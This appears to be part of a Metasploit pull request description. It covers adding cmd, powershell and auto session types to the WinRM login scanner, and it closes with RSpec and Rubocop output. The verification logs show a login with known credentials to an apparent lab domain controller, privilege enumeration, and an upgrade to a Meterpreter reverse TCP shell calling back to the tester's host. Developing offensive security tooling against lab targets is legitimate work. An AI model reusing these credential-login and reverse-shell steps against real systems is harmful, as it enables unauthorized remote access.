   DB_ALL_USERS      false            no        Add all users in the current database to the list
   DB_SKIP_EXISTING  none             no        Skip existing credentials stored in the current database (Accepted: none, user, user&realm)
   DOMAIN            WORKSTATION      yes       The domain to use for Windows authentication
   PASSWORD                           no        A specific password to authenticate with
   PASS_FILE                          no        File containing passwords, one per line
   Proxies                            no        A proxy chain of format type:host:port[,type:host:port][...]. Supported proxies: sapni, socks4, http, socks5, socks5h
   RHOSTS                             yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
   RPORT             5985             yes       The target port (TCP)
   SSL               false            no        Negotiate SSL/TLS for outgoing connections
   STOP_ON_SUCCESS   false            yes       Stop guessing when a credential works for a host
   SessionType       cmd              yes       The WinRM shell type to create when CreateSession is enabled (Accepted: cmd, powershell, auto)
   THREADS           1                yes       The number of concurrent threads (max one per host)
   URI               /wsman           yes       The URI of the WinRM service
   USERNAME                           no        A specific username to authenticate as
   USERPASS_FILE                      no        File containing users and passwords separated by space, one pair per line
   USER_AS_PASS      false            no        Try the username as the password for all users
   USER_FILE                          no        File containing usernames, one per line
   VERBOSE           true             yes       Whether to print output for all attempts
   VHOST                              no        HTTP server virtual host


View the full module info with the info, or info -d command.
```

SessionType=cmd (Default)

```
msf auxiliary(scanner/winrm/winrm_login) > run rhosts=10.129.30.43 domain=eighteen.htb username=adam.scott password=iloveyou1
[!] No active DB -- Credential data will not be saved!
[+] 10.129.30.43:5985 - Login Successful: eighteen.htb\adam.scott:iloveyou1
[!] 10.129.30.43:5985 - Credentials were correct, but WinRM cmd shell CreateShell was denied for user: adam.scott. Try setting SessionType to powershell or auto.
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
```

SessionType=powershell

```
msf auxiliary(scanner/winrm/winrm_login) > run rhosts=10.129.30.43 domain=eighteen.htb username=adam.scott password=iloveyou1 sessiontype=powershell
[!] No active DB -- Credential data will not be saved!
[+] 10.129.30.43:5985 - Login Successful: eighteen.htb\adam.scott:iloveyou1
[*] WinRM PowerShell session 3 opened (10.10.16.243:39103 -> 10.129.30.43:5985) at 2026-05-01 01:05:24 +0900
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
```

SessionType=auto

```
msf auxiliary(scanner/winrm/winrm_login) > run rhosts=10.129.30.43 domain=eighteen.htb username=adam.scott password=iloveyou1 sessiontype=auto
[!] No active DB -- Credential data will not be saved!
[+] 10.129.30.43:5985 - Login Successful: eighteen.htb\adam.scott:iloveyou1
[!] 10.129.30.43:5985 - Credentials were correct, but WinRM cmd shell CreateShell was denied for user: adam.scott
[*] 10.129.30.43:5985 - Falling back to a WinRM PowerShell session because cmd shell CreateShell was denied
[*] WinRM PowerShell session 1 opened (10.10.16.243:41145 -> 10.129.30.43:5985) at 2026-05-01 02:27:55 +0900
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
```



<details>
<summary>WinRM PowerShell session interaction after login</summary>

```
msf auxiliary(scanner/winrm/winrm_login) > sessions -i 1
[*] Starting interaction with 1...

whoami
eighteen\adam.scott
^Z
Background session 1? [y/N]  N
whoami /priv

PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                    State
============================= ============================== =======
SeMachineAccountPrivilege     Add workstations to domain     Enabled
SeChangeNotifyPrivilege       Bypass traverse checking       Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled
^Z
Background session 1? [y/N]  y
```

</details>


<details>
<summary>WinRM PowerShell session upgrade</summary>

```
msf auxiliary(scanner/winrm/winrm_login) > sessions -u 1
[*] Executing 'post/multi/manage/shell_to_meterpreter' on session(s): [1]
[!] SESSION may not be compatible with this module:
[!]  * incompatible session type: powershell. This module works with: shell, meterpreter.
[*] Upgrading session ID: 1
[*] Starting exploit/multi/handler
[*] Started reverse TCP handler on 10.10.16.243:4433
msf auxiliary(scanner/winrm/winrm_login) >
[*] Sending stage (248902 bytes) to 10.129.30.43
[*] Meterpreter session 2 opened (10.10.16.243:4433 -> 10.129.30.43:56941) at 2026-05-01 02:28:40 +0900
[*] Stopping exploit/multi/handler

msf auxiliary(scanner/winrm/winrm_login) > sessions -l

Active sessions
===============

  Id  Name  Type                     Information                                                  Connection
  --  ----  ----                     -----------                                                  ----------
  1         powershell windows       WinRM PowerShell adam.scott:iloveyou1 (EIGHTEEN\adam.scott)  10.10.16.243:41145 -> 10.129.30.43:5985 (10.129.30.43)
  2         meterpreter x64/windows  EIGHTEEN\adam.scott @ DC01                                   10.10.16.243:4433 -> 10.129.30.43:56941 (10.129.30.43)

msf auxiliary(scanner/winrm/winrm_login) > sessions -i 2
[*] Starting interaction with 2...

meterpreter > execute -f powershell.exe -i -a "-NoLogo -NoProfile"
Process 5128 created.
Channel 1 created.
PS C:\WINDOWS\system32> whoami
whoami
eighteen\adam.scott
```

</details>


## Code Testing

<details>
<summary>RSpec output</summary>

```
bundle exec rspec \
  spec/lib/net/winrm/connection_spec.rb \
  spec/modules/auxiliary/scanner/winrm/winrm_login_spec.rb \
  spec/lib/msf/base/sessions/winrm_power_shell_spec.rb
Overriding user environment variable 'OPENSSL_CONF' to enable legacy functions.
Run options:
  include {:focus=>true}
  exclude {:acceptance=>true}

All examples were filtered out; ignoring {:focus=>true}

Randomized with seed 61701
Net::MsfWinRM::RexWinRMConnection::ShellFactory ....
Msf::Sessions::WinrmPowerShell ................
WinRM Login Scanner ..........

Top 10 slowest examples (1.07 seconds, 73.6% of total time):
  WinRM Login Scanner SessionType option accepts cmd, powershell, and auto
    0.97974 seconds ./spec/modules/auxiliary/scanner/winrm/winrm_login_spec.rb:41
  Net::MsfWinRM::RexWinRMConnection::ShellFactory#create_shell delegates other shell types to the upstream factory
    0.01844 seconds ./spec/lib/net/winrm/connection_spec.rb:28
  WinRM Login Scanner #create_winrm_session when SessionType is cmd creates the existing stdin cmd shell session
    0.01112 seconds ./spec/modules/auxiliary/scanner/winrm/winrm_login_spec.rb:57
  Msf::Sessions::WinrmPowerShell#shell_command uses the existing PowerShell marker command handling
    0.00932 seconds ./spec/lib/msf/base/sessions/winrm_power_shell_spec.rb:153
  WinRM Login Scanner #create_winrm_session when SessionType is auto does not fall back to PowerShell when session registration raises a WSMan fault
    0.0093 seconds ./spec/modules/auxiliary/scanner/winrm/winrm_login_spec.rb:161
  WinRM Login Scanner #create_winrm_session when SessionType is auto falls back to PowerShell on cmd.exe CreateShell access denied
    0.00911 seconds ./spec/modules/auxiliary/scanner/winrm/winrm_login_spec.rb:143
  Msf::Sessions::WinrmPowerShell#type returns powershell
    0.00852 seconds ./spec/lib/msf/base/sessions/winrm_power_shell_spec.rb:78
  WinRM Login Scanner #create_winrm_session when SessionType is auto falls back to PowerShell on cmd CreateShell access denied
    0.00823 seconds ./spec/modules/auxiliary/scanner/winrm/winrm_login_spec.rb:126
  WinRM Login Scanner #create_winrm_session when SessionType is powershell creates a WinRM PowerShell session
    0.00803 seconds ./spec/modules/auxiliary/scanner/winrm/winrm_login_spec.rb:92
  Msf::Sessions::WinrmPowerShell Msf::Sessions::WinrmPowerShell::WinRMPowerShellStreamAdapter buffers WinRM fault output and ends the session with the fault reason
    0.0077 seconds ./spec/lib/msf/base/sessions/winrm_power_shell_spec.rb:126

Top 3 slowest example groups:
  WinRM Login Scanner
    0.10649 seconds average (1.06 seconds / 10 examples) ./spec/modules/auxiliary/scanner/winrm/winrm_login_spec.rb:5
  Net::MsfWinRM::RexWinRMConnection::ShellFactory
    0.0623 seconds average (0.24921 seconds / 4 examples) ./spec/lib/net/winrm/connection_spec.rb:5
  Msf::Sessions::WinrmPowerShell
    0.00826 seconds average (0.13217 seconds / 16 examples) ./spec/lib/msf/base/sessions/winrm_power_shell_spec.rb:5

Finished in 1.45 seconds (files took 2.94 seconds to load)
30 examples, 0 failures

Randomized with seed 61701
Coverage report generated for RSpec to coverage.
Line Coverage: 30.45% (7729 / 25384)
```

</details>


<details>
<summary>Rubocop output</summary>

```
$ ruby tools/dev/msftidy.rb modules/auxiliary/scanner/winrm/winrm_login.rb
modules/auxiliary/scanner/winrm/winrm_login.rb - [*] Rubocop not required for older modules skipping. If making a large update - run rubocop rubocop -a modules/auxiliary/scanner/winrm/winrm_login.rb and verify all issues are resolved

$ rubocop -a modules/auxiliary/scanner/winrm/winrm_login.rb
Inspecting 1 file
.

1 file inspected, no offenses detected

$ bundle exec rubocop \
  lib/net/winrm/connection.rb \
  lib/net/winrm/power_shell.rb \
  lib/msf/base/sessions/winrm_power_shell.rb \
  modules/auxiliary/scanner/winrm/winrm_login.rb \
  spec/lib/net/winrm/connection_spec.rb \
  spec/modules/auxiliary/scanner/winrm/winrm_login_spec.rb \
  spec/lib/msf/base/sessions/winrm_power_shell_spec.rb
Inspecting 7 files
.......

7 files inspected, no offenses detected
```

</details>
